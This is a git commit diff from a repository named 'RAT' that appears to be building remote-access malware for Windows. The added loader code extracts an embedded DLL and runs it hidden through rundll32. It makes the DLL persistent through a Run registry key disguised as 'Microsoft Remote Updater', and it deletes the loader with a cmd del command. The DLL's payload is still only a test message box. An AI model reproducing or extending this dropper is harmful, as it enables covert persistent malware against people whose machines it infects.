DLL now has persistance, Loader deletes itself after extracting dll and creating persistance
This commit is contained in:
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,5 +1,6 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
||||||
|
fundll.cpp
|
||||||
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
||||||
Generating code
|
Generating code
|
||||||
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1
-1
@@ -31,7 +31,7 @@
|
|||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<PlatformToolset>v141_xp</PlatformToolset>
|
<PlatformToolset>v141_xp</PlatformToolset>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
|||||||
+7
-3
@@ -6,14 +6,18 @@ BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
|||||||
|
|
||||||
break;
|
break;
|
||||||
case DLL_PROCESS_DETACH:
|
case DLL_PROCESS_DETACH:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
default:
|
default:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
return 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) int FunEntry() {
|
extern "C" __declspec(dllexport) int FunEntry() {
|
||||||
return MessageBoxA(0, "Hello from C2", 0, 0);
|
char exe[MAX_PATH + 1];
|
||||||
|
GetModuleFileNameA(0, exe, sizeof(exe));
|
||||||
|
MessageBoxA(0, exe, "I am inside: ", 0);
|
||||||
|
return 0;
|
||||||
}
|
}
|
||||||
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
LINK : C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe not found or not built by the last incremental link; performing full link
|
injector.cpp
|
||||||
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,6 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
|
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
|
||||||
|
loader.cpp
|
||||||
|
tools.cpp
|
||||||
|
Generating Code...
|
||||||
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -96,7 +96,7 @@
|
|||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
|
<AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
|
||||||
</Link>
|
</Link>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
|||||||
+49
-1
@@ -4,7 +4,7 @@
|
|||||||
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
||||||
PBYTE module_base = PBYTE(Tools::GetImageBase());
|
PBYTE module_base = PBYTE(Tools::GetImageBase());
|
||||||
if (module_base != ERROR) {
|
if (module_base != ERROR) {
|
||||||
// extract payload from section move to %appdata% with random name
|
// extract payload from section
|
||||||
DWORD module_size = NULL;
|
DWORD module_size = NULL;
|
||||||
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
|
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
|
||||||
|
|
||||||
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
|
|||||||
if (new_file != INVALID_HANDLE_VALUE) {
|
if (new_file != INVALID_HANDLE_VALUE) {
|
||||||
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
|
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
|
||||||
}
|
}
|
||||||
|
CloseHandle(new_file);
|
||||||
|
}
|
||||||
|
LocalFree(dll_memory);
|
||||||
|
|
||||||
|
// runs the dll after extraction
|
||||||
|
WCHAR win_path[MAX_PATH];
|
||||||
|
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
|
||||||
|
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
|
||||||
|
lstrcatW(win_path, appdata_path);
|
||||||
|
lstrcatW(win_path, L",");
|
||||||
|
lstrcatW(win_path, L"FunEntry");
|
||||||
|
|
||||||
|
STARTUPINFO startup_inf{ 0 };
|
||||||
|
PROCESS_INFORMATION process_information{ 0 };
|
||||||
|
startup_inf.cb = sizeof(startup_inf);
|
||||||
|
|
||||||
|
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
|
||||||
|
|
||||||
|
if (b) {
|
||||||
|
HKEY reg_key;
|
||||||
|
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, ®_key);
|
||||||
|
if (bb == ERROR_SUCCESS) {
|
||||||
|
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
|
||||||
|
RegCloseKey(reg_key);
|
||||||
|
}
|
||||||
|
//WaitForSingleObject(process_information.hProcess, INFINITE);
|
||||||
|
//CloseHandle(process_information.hProcess);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// delete loader
|
||||||
|
WCHAR del_cmd[MAX_PATH];
|
||||||
|
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
|
||||||
|
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
|
||||||
|
WCHAR app_name[MAX_PATH];
|
||||||
|
GetModuleFileNameW(0, app_name, MAX_PATH);
|
||||||
|
lstrcatW(del_cmd, L"/c del \"");
|
||||||
|
lstrcatW(del_cmd, app_name);
|
||||||
|
lstrcatW(del_cmd, L"\"");
|
||||||
|
|
||||||
|
STARTUPINFO sii{ 0 };
|
||||||
|
PROCESS_INFORMATION pii{ 0 };
|
||||||
|
sii.cb = sizeof(sii);
|
||||||
|
|
||||||
|
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
|
||||||
|
return 0;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
Reference in New Issue
Block a user